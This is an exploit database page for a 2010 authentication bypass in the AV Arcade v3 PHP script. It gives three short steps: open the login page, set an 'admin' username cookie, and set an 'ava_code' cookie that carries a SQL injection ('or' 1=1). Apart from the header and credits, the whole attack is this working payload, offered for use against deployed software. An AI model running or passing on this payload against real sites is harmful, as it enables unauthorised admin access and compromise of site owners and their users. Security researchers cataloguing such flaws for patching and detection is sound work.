AV Arcade v3 Cookie SQL Injection Authentication Bypass



EDB-ID: 14494 CVE: 2010-2933OSVDB-ID: 66888
Author: saudi0hackerPublished: 2010-07-28Verified: Not Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
:----------------------------------------------------------------------------:
: # Software      : AV Arcade v3   [PHP]                                     :
: # Site          : www.avscripts.net                                        :
: # Date          : 28/07/2010                                               :
: # Author        : saudi0hacker                                             :
: # Type          : Auth Bypass / Cookie                                     :
: # Greetz to     : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:
[1] Go to the URL:
    http://www.xxxxx.net/index.php?task=login
[2] Apply these Cookie:
    Javascript:document.cookie = "ava_username=admin;"
    Javascript:document.cookie = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"
[3] Go to main Page:
[4] Enjoy






Comments

No comments so far